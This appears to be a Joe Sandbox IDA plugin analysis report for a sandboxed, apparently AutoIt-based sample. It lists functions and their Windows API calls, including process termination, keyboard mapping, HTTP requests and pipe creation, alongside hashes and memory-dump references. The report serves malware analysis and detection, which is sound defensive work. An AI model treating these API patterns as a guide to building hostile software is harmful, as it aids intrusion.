Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 728dd4cfe8f68a4a36237ed6361042fb9e5b9310f8b20d6c15fed250a9da888d
Instruction ID: 6c94bbba30335adb947dd3bfe2b9499e8fcdc4226229bca1f6a554fb7735ec40
Opcode Fuzzy Hash: 728dd4cfe8f68a4a36237ed6361042fb9e5b9310f8b20d6c15fed250a9da888d
Instruction Fuzzy Hash: 5F11477250120EEFDF018FA4ED89BDE7BA9EB08305F044055FE08A2160C3729DA4EB64

Function 0025C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0025C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0025C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025C366
ReleaseDC.USER32(00000000,00000000), ref: 0025C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0025C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0025C397

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 263823c034400d1d9f75d40152822f20c8f5f8fadd985845e091beff5f1c39d0
Instruction ID: 77c8dac07292e0f9d3f6f17d56c199801f670f50be18a0c94573d7208f3975d6
Opcode Fuzzy Hash: 263823c034400d1d9f75d40152822f20c8f5f8fadd985845e091beff5f1c39d0
Instruction Fuzzy Hash: 1C012575E40319BFDB105BA59C49A5ABFB8EF48751F104066FE04A7240D6719910CF54

Function 0028C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 002016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201729
Part of subcall function 002016CF: SelectObject.GDI32(?,00000000), ref: 00201738
Part of subcall function 002016CF: BeginPath.GDI32(?), ref: 0020174F
Part of subcall function 002016CF: SelectObject.GDI32(?,00000000), ref: 00201778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0028C57C
LineTo.GDI32(00000000,00000003,?), ref: 0028C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0028C59E
LineTo.GDI32(00000000,00000000,?), ref: 0028C5AE
EndPath.GDI32(00000000), ref: 0028C5BE
StrokePath.GDI32(00000000), ref: 0028C5CE

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 18a4eb61761485dc5b9174eb21cdfc6983479c015e2c379a9c8c3e51789a5c31
Instruction ID: 57ade28df6657e7945f30ffdb32c1ce11b3a61b4e5e4db9b98e76dfc0aa21a81
Opcode Fuzzy Hash: 18a4eb61761485dc5b9174eb21cdfc6983479c015e2c379a9c8c3e51789a5c31
Instruction Fuzzy Hash: 1011CC7600010DBFDF129F90EC88EAA7F6DEF04354F048062BA18561A1D771AE65DFA0

Function 002207BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002207EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 002207F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002207FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0022080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00220812
MapVirtualKeyW.USER32(00000012,00000000), ref: 0022081A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 92ed07b582de8e35eec8c7d40b3816121d188cfa1ba7173acc478208b4fb676c
Instruction ID: bfd0ccb5e97da62862979007d9eb09632ab0c62696df31b4cd20e93c7db0e086
Opcode Fuzzy Hash: 92ed07b582de8e35eec8c7d40b3816121d188cfa1ba7173acc478208b4fb676c
Instruction Fuzzy Hash: 9B0148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847941C7B5A864CBE5

Function 002659A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002659B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002659CA
GetWindowThreadProcessId.USER32(?,?), ref: 002659D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002659E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002659F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002659F9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b8b06dd5bce050bf07ef12e5bbfb5ba6dca71969629d6ca6ec21b44825ee0182
Instruction ID: 82abe187997bc1f65a137ccbb505f8b9bc8a71fd1b4b5e8287e92c39bd06b489
Opcode Fuzzy Hash: b8b06dd5bce050bf07ef12e5bbfb5ba6dca71969629d6ca6ec21b44825ee0182
Instruction Fuzzy Hash: 5AF0303264115CBFE7215B92AC4DEEF7B7CEFC6B11F00015AFA0591050D7A01A1186B5

Function 002677EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 002677FE
EnterCriticalSection.KERNEL32(?,?,0020C2B6,?,?), ref: 0026780F
TerminateThread.KERNEL32(00000000,000001F6,?,0020C2B6,?,?), ref: 0026781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0020C2B6,?,?), ref: 00267829

Part of subcall function 002671F0: CloseHandle.KERNEL32(00000000,?,00267836,?,0020C2B6,?,?), ref: 002671FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 0026783C
LeaveCriticalSection.KERNEL32(?,?,0020C2B6,?,?), ref: 00267843

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3fea55c1da36f341223acc878d8852f61c6d2103d8bb18712763699e145d7f52
Instruction ID: 5455a1b4c416c739583f6b28fad0426795e262edd070bb922c5b1d7cbc04c76f
Opcode Fuzzy Hash: 3fea55c1da36f341223acc878d8852f61c6d2103d8bb18712763699e145d7f52
Instruction Fuzzy Hash: 86F05832955216AFD7112BA4FCCCAAB7769FF49302B140423FA02A50A4CBB66C51DB60

Function 0025954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00259555
UnloadUserProfile.USERENV(?,?), ref: 00259561
CloseHandle.KERNEL32(?), ref: 0025956A
CloseHandle.KERNEL32(?), ref: 00259572
GetProcessHeap.KERNEL32(00000000,?), ref: 0025957B
HeapFree.KERNEL32(00000000), ref: 00259582

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 13d0a9090765a2f63ad4221ac0ae008e0565d8c15c7a974bdb0908de0d155ce8
Instruction ID: 200e9493663f79972e7cd2394f275a2ae25436b73e49c3560ba7385be6d334d2
Opcode Fuzzy Hash: 13d0a9090765a2f63ad4221ac0ae008e0565d8c15c7a974bdb0908de0d155ce8
Instruction Fuzzy Hash: E7E07577104509BFDB411FE5FC4C99ABF79FF49722B504622F21991470CB32A461DB54

Function 00278CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00278CFD
CharUpperBuffW.USER32(?,?), ref: 00278E0C
VariantClear.OLEAUT32(?), ref: 00278F84

Part of subcall function 00267B1D: VariantInit.OLEAUT32(00000000), ref: 00267B5D
Part of subcall function 00267B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00267B66
Part of subcall function 00267B1D: VariantClear.OLEAUT32(00000000), ref: 00267B72

Strings

Incorrect Parameter format, xrefs: 00278D35, 00278EF7
AUTOIT.ERROR, xrefs: 00278E12

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 1d22c8264e7dac6fd64a172bb4f2467515a5cd3b168ecccee3c5f24573e2b49a
Instruction ID: 10d6cd09738f4aae714eb65d1f36cd43008b073bed0481bde9490e65b051feec
Opcode Fuzzy Hash: 1d22c8264e7dac6fd64a172bb4f2467515a5cd3b168ecccee3c5f24573e2b49a
Instruction Fuzzy Hash: 8E91AD706243029FC710DF24C48495ABBF5EF99354F04896EF98A8B3A2DB30E955CF92

Function 0026323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0021436A: _wcscpy.LIBCMT ref: 0021438D

_memset.LIBCMT ref: 0026332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00263410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0026343E

Strings

0, xrefs: 0026331A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 871e576b5aa56d72b83127c99c561f798cd967c36ff19dbbeabf6f78b1e0d592
Instruction ID: 7beb7759736d8754a21440095c322d5e9b1280ed888a11c3db0d9ab225d2c1eb
Opcode Fuzzy Hash: 871e576b5aa56d72b83127c99c561f798cd967c36ff19dbbeabf6f78b1e0d592
Instruction Fuzzy Hash: 8D51AF31628302ABD715DE28D845A6BB7E8EF55720F04062EF895D2291DB70DEA4CB92

Function 00262EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00262F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00262F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00262FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002C7890,00000000), ref: 00263012

Strings

0, xrefs: 00262F5C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 73e5c1e39bab38a51980930c96f82f0362f170d5a3d449396b2d1d787aaf57c2
Instruction ID: 58b129e99e94aa6521dce802fc93a9d28ddc8e968aec4a69c0de2e16bc976f2b
Opcode Fuzzy Hash: 73e5c1e39bab38a51980930c96f82f0362f170d5a3d449396b2d1d787aaf57c2
Instruction Fuzzy Hash: D641C531218342DFD720DF24C884B5ABBE8EF84310F10462EF56597291DB70EA59CB52

Function 0027DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0027DEAE

Part of subcall function 00211462: _memmove.LIBCMT ref: 002114B0

Strings

cdecl, xrefs: 0027DF05
winapi, xrefs: 0027DF1F
none, xrefs: 0027DF89
stdcall, xrefs: 0027DF30

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: cd4c9587d427ec25d27832b4d8b4b49f8413dfb3e01ba53f884300aaeada7818
Instruction ID: 467987469a69e36fc7c66ac27414558beb7484804563d97b89152a0edd6ec651
Opcode Fuzzy Hash: cd4c9587d427ec25d27832b4d8b4b49f8413dfb3e01ba53f884300aaeada7818
Instruction Fuzzy Hash: 6131A67052022AAFCF10EF94C9419EEB3B4FF15310B10862AF96A976D1DB71AD25CF91

Function 00259A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00259ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00259ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00259B0F

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Strings

ComboBox, xrefs: 00259A56
ListBox, xrefs: 00259A8B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: d5026e7747781b89273f27fd5fc8e400fdfbd27c9b709bfc17c9fc145b75f722
Instruction ID: cdb9bbb3fd10adbec1d2857af2904406ef7be26294579bce95441ef9ea137ebd
Opcode Fuzzy Hash: d5026e7747781b89273f27fd5fc8e400fdfbd27c9b709bfc17c9fc145b75f722
Instruction Fuzzy Hash: E221E472920108BEEB24EBA0DC85CFEB7ACDF55360F10411AFC25972D1DB3449B99A64

Function 00271EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00271F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00271F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00271F6E
InternetCloseHandle.WININET(00000000), ref: 00271FB5

Part of subcall function 00272B4F: GetLastError.KERNEL32(?,?,00271EE3,00000000,00000000,00000001), ref: 00272B64
Part of subcall function 00272B4F: SetEvent.KERNEL32(?,?,00271EE3,00000000,00000000,00000001), ref: 00272B79

Strings

, xrefs: 00271F5F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: e026565fb497a48cdf0f6f146383550e60ef7ec5eb1bcbe5587eb9e89518d32b
Instruction ID: 33bbd1dbb8e4994a8ccef1f0b9599e4b5c486f985a4b04c691399fafbe7dcc0b
Opcode Fuzzy Hash: e026565fb497a48cdf0f6f146383550e60ef7ec5eb1bcbe5587eb9e89518d32b
Instruction Fuzzy Hash: E121DEB1624308BEEB119F64DCC5EBBB6ADEF48754F10801AF409A2240DB749D249AA6

Function 00286A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00202111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020214F
Part of subcall function 00202111: GetStockObject.GDI32(00000011), ref: 00202163
Part of subcall function 00202111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00286A86
LoadLibraryW.KERNEL32(?), ref: 00286A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00286AA2
DestroyWindow.USER32(?), ref: 00286AAA

Strings

SysAnimate32, xrefs: 00286A61

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 3cd201a744a4afb10ad025839b4784d00e96beea956fd056781db969dda5bb44
Instruction ID: 91f7b54ec6483574c51102a3847ab073aee5231789944f300bf864a00c5c2842
Opcode Fuzzy Hash: 3cd201a744a4afb10ad025839b4784d00e96beea956fd056781db969dda5bb44
Instruction Fuzzy Hash: DF21F679221206AFEF14AF64DC89EBB77ADEF45324F108219FA50B21D0D371CC609B60

Function 00267357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00267377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002673AA
GetStdHandle.KERNEL32(0000000C), ref: 002673BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002673F6

Strings

nul, xrefs: 002673F1

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: bcc83f05207e2c90b8b107c06fe466ac57a87df356ed3dd47e5e23b2e43821bf
Instruction ID: 6ceaf1d4a7031b560fe7f0ae0c639009ea1456cb9c19ba3fe0d1f7479afd9aab
Opcode Fuzzy Hash: bcc83f05207e2c90b8b107c06fe466ac57a87df356ed3dd47e5e23b2e43821bf
Instruction Fuzzy Hash: 9F21837051830A9FDB209F64FC49A9A77A4AF55728F204A5AFCA0D73D0D77098B0DB50

Function 00267425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00267444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00267476
GetStdHandle.KERNEL32(000000F6), ref: 00267487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002674C1

Strings

nul, xrefs: 002674BC

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: cff4937bf6457707dca7b263cdb039eb50735dbb72da8ba71271eaea8fb45768
Instruction ID: af841e5786a0488308835612bca961dfd2a291c8ee90cfd5f0e0f04090904716
Opcode Fuzzy Hash: cff4937bf6457707dca7b263cdb039eb50735dbb72da8ba71271eaea8fb45768
Instruction Fuzzy Hash: 612195315242069FDB209F68AC4CA997BB8AF55728F200A19FDA1D72D0DF7198A0CB50

Function 0026B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0026B2EB
__swprintf.LIBCMT ref: 0026B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00290980), ref: 0026B342

Strings

%lu, xrefs: 0026B2FE

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
